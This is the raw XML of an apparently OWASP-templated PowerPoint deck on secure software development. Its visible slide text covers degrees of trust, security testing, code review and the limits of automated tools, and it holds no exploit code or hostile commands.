      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="76" name="Group 75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="889000" y="5270500"/>
            <a:ext cx="6199632" cy="711200"/>
            <a:chOff x="889000" y="5270500"/>
            <a:chExt cx="6199632" cy="711200"/>
          </a:xfrm>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFF200"/>
              </a:gs>
              <a:gs pos="45000">
                <a:srgbClr val="FF7A00"/>
              </a:gs>
              <a:gs pos="70000">
                <a:srgbClr val="FF0300"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="4D0808"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gradFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="Up Arrow 71"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="889000" y="5270500"/>
              <a:ext cx="484632" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="up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3" name="Up Arrow 72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3860800" y="5270500"/>
              <a:ext cx="484632" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="up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4" name="Up Arrow 73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6604000" y="5270500"/>
              <a:ext cx="484632" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="up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5" name="Rectangle 74"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="990600" y="5727700"/>
              <a:ext cx="5981700" cy="25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smtClean="0"/>
                <a:t>Degrees of trust</a:t>
              </a:r>
              <a:endParaRPr lang="en-IE" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003300" y="6248400"/>
            <a:ext cx="5953040" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You may not let some of the people who have developed your code into your offices!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1200" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="5816600"/>
            <a:ext cx="1066800" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>More</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6908800" y="5791200"/>
            <a:ext cx="1066800" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Less</a:t>
            </a:r>
            <a:endParaRPr lang="en-I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How do we (attempt) to fix this problem?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Secure Software development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Application Security Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(Manual, Automated)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Code review </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(Automated, Manual)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2000" dirty="0" smtClean="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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 9" descr="j0340526"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="5719763"/>
            <a:ext cx="887413" cy="909637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4508500" y="4521200"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5448300" y="2844801"/>
            <a:ext cx="3092513" cy="3200876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="65000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" b="1" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>CHALLENGES FACING HUMANITY </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Make solar energy affordable</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Provide energy from fusion</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Develop carbon sequestration</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Manage the nitrogen cycle</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Provide access to clean water</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Reverse engineer the brain</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Prevent nuclear terror</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" b="1" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>Secure cyberspace</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Enhance virtual reality </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Improve urban infrastructure</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Advance health informatics</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Engineer better medicines</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Advance personalised learning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>Explore natural frontiers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="1200" kern="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>http://news.bbc.co.uk/2/hi/7248875.stm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IE" dirty="0" smtClean="0"/>
              <a:t>Solutions</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{C08A0EE9-3D3E-4A2C-A8D1-504A74AADE07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>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03/10/2009" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/10/2009" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/10/2009" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/10/2009" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="OWASP Presentation Template">
  <a:themeElements>
    <a:clrScheme name="OWASP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WASP Presentation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WASP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WASP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WASP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WASP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WASP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WASP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WASP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WASP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WASP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WASP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WASP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WASP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WASP Presentation Template">
  <a:themeElements>
    <a:clrScheme name="2_OWASP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OWASP Presentation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WASP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OWASP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OWASP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OWASP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OWASP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OWASP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OWASP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OWASP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OWASP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OWASP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OWASP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OWASP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OWASP Presentation Template</Template>
  <TotalTime>6796</TotalTime>
  <Words>1555</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>307</Paragraphs>
  <Slides>25</Slides>
  <Notes>3</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25</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="29" baseType="lpstr">
      <vt:lpstr>OWASP Presentation Template</vt:lpstr>
      <vt:lpstr>2_OWASP Presentation Template</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Chart</vt:lpstr>
      <vt:lpstr>Secure development (for a secure planet) </vt:lpstr>
      <vt:lpstr>ME</vt:lpstr>
      <vt:lpstr>The ISSUE…</vt:lpstr>
      <vt:lpstr>Things are not improving</vt:lpstr>
      <vt:lpstr>What’s in your code?</vt:lpstr>
      <vt:lpstr>Where is your Application Perimeter?</vt:lpstr>
      <vt:lpstr>Software food chain</vt:lpstr>
      <vt:lpstr>How do we (attempt) to fix this problem?</vt:lpstr>
      <vt:lpstr>Slide 9</vt:lpstr>
      <vt:lpstr>Philosophy of Secure Development</vt:lpstr>
      <vt:lpstr>Philosophy of Secure Development</vt:lpstr>
      <vt:lpstr>Application Security Verification Techniques (360°) – Check out the OWASP ASVS</vt:lpstr>
      <vt:lpstr>Runtime Testing</vt:lpstr>
      <vt:lpstr>Runtime Testing</vt:lpstr>
      <vt:lpstr>Lets look at Code review</vt:lpstr>
      <vt:lpstr>Code Review (Static Analysis)</vt:lpstr>
      <vt:lpstr>Code Review</vt:lpstr>
      <vt:lpstr>Code review</vt:lpstr>
      <vt:lpstr>Code review</vt:lpstr>
      <vt:lpstr>Code review</vt:lpstr>
      <vt:lpstr>Tools – At Best 45%!</vt:lpstr>
      <vt:lpstr>Finally….Malware and Rootkits…Tools just don’t cut it</vt:lpstr>
      <vt:lpstr>Slide 23</vt:lpstr>
      <vt:lpstr>Solution: No single answer</vt:lpstr>
      <vt:lpstr>Slide 25</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OWASP Plan - Strawman</dc:title>
  <dc:subject>Application Security</dc:subject>
  <dc:creator>Jeff Williams</dc:creator>
  <cp:keywords>Application Security</cp:keywords>
  <dc:description>http://www.owasp.org</dc:description>
  <cp:lastModifiedBy>Telindus NV</cp:lastModifiedBy>
  <cp:revision>287</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2005-03-04T17:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2009-11-30T16:10:19Z</dcterms:modified>
  <cp:category>Application Security</cp:category>
</cp:coreProperties>
</file>